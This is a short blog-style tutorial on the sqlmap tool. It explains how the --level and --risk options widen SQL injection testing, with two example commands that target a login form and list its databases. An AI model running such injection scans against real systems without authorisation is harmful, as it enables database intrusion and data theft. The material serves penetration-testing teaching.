Through utilizing the parameters "--level" and "--risk", more test cases would be launched so that the scanning success rate would go higher.
For instance, below is an ordinary scanning command:
# sqlmap -u http://sql1.webapp.site/login.php --data='username=test&password=test&submit=Login' -p username --dbs
In terms of the command above, the chance of getting any useful information may not be high. However, if you try:
# sqlmap -u http://sql1.webapp.site/login.php --data='username=test&password=test&submit=Login' -p username --level 3 --risk 3 --dbs
You may get what you want directly.
Again, the parameter "--level" (ranges from 1 to 5) defines the number of checks/payload to be performed, and the parameter "--risk" (ranges from 1 to 3) reflects the type of payloads being used.
No comments:
Post a Comment